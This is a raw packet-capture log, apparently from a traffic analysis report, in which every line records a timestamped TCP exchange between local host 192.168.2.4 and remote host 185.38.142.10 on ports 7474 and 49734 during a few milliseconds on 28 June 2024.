                  Jun 28, 2024 08:58:04.828444958 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828455925 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828464031 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828488111 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828505039 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828515053 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828515053 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828556061 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828588963 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828600883 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828609943 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828620911 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828639984 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828649044 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828649998 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828666925 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828674078 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828704119 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828708887 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828711987 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828725100 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828728914 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828788042 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828788042 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828799963 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828809977 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828844070 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828860998 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828871965 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828876972 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828881025 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828888893 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828908920 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828929901 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828941107 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828952074 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.828952074 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828964949 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828984976 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.828994989 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829014063 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829036951 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829041004 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829047918 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829075098 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829087973 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829103947 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829118967 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829148054 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829165936 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829175949 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829185009 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829205036 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829215050 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829221964 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829241991 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829243898 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829274893 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829288960 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829293013 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829299927 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829319954 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829339027 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829359055 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829369068 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829372883 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829386950 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829405069 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829415083 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829447031 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829457998 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829474926 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829480886 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829487085 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829509020 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829509974 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829538107 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829580069 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829591036 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829598904 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829607964 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829627037 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829627991 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829639912 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829649925 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829668045 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829672098 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829694986 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829727888 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829772949 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829783916 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829801083 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829811096 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829830885 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829852104 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829883099 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829894066 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829901934 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829922915 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829932928 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829936028 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829943895 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829952955 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.829971075 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829982042 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.829988003 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.830010891 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.830022097 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.830039978 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.830065966 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.831314087 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831363916 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.831381083 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831428051 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.831860065 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831871033 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831880093 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831890106 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831914902 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831918001 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.831926107 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831937075 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831938982 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.831947088 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831957102 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.831969023 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.831988096 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832005978 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832045078 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832056046 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832066059 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832075119 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832083941 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832093000 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832097054 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832103014 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832113028 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832122087 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832123041 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832133055 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832137108 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832144976 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832158089 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832165956 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832176924 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832185030 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832195044 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832196951 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832205057 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832216024 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832218885 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832235098 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832246065 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832248926 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832257032 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832264900 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832268000 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832278967 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832288980 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832297087 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832298040 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832319021 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832329988 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832330942 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832341909 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832350969 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832353115 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832370043 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832375050 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832386017 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832395077 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832405090 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832408905 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832416058 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832426071 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832432985 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832447052 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832456112 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832458973 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832468987 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832470894 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832490921 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832508087 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832516909 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832519054 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832529068 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832539082 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832547903 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832557917 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832575083 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832592010 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832598925 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832603931 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832634926 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832647085 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832684040 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832778931 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832789898 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832799911 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832820892 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832829952 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832839012 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832839966 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832859993 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832870007 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832879066 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832879066 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832891941 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832892895 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832901955 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832912922 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832923889 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832952023 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832962990 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.832966089 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.832982063 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833010912 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833024979 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833024979 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833035946 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833046913 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833065987 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833095074 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833110094 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833133936 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833144903 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833153009 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833163977 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833173037 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833183050 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833184958 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833201885 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833204031 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833214998 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833225012 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833233118 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833235025 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833245993 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833245993 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833259106 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833268881 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833286047 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833311081 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833323956 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833333969 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833343983 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833352089 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833362103 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833369970 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833384991 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833391905 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833401918 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833411932 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833426952 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833444118 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833446980 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833456993 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833467007 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833492994 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833503008 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833503008 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833517075 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833547115 CEST497347474192.168.2.4185.38.142.10
                  Jun 28, 2024 08:58:04.833575010 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833585024 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833592892 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833604097 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833647013 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833656073 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833663940 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833674908 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833693027 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833703041 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833735943 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833745003 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833754063 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833772898 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833782911 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833802938 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833811998 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833822966 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833832979 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833899021 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833909035 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833957911 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833967924 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.833992958 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834002972 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834011078 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834021091 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834041119 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834072113 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834094048 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834114075 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834131002 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834141016 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834176064 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834186077 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834193945 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834230900 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834249020 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834259033 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834269047 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834278107 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834316969 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834326982 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834335089 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834350109 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834368944 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834378004 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834387064 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834414959 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834424973 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834439039 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834460020 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834470034 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834479094 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834537983 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834547997 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834566116 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834574938 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834587097 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834595919 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834659100 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834669113 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834676981 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834686995 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834696054 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834707975 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834717035 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834728003 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834738016 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834755898 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834764957 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834773064 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834783077 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834820986 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834830999 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834840059 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834849119 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834858894 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834868908 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834887981 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834897041 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834904909 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834914923 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834923983 CEST747449734185.38.142.10192.168.2.4
                  Jun 28, 2024 08:58:04.834948063 CEST747449734185.38.142.10192.168.2.4
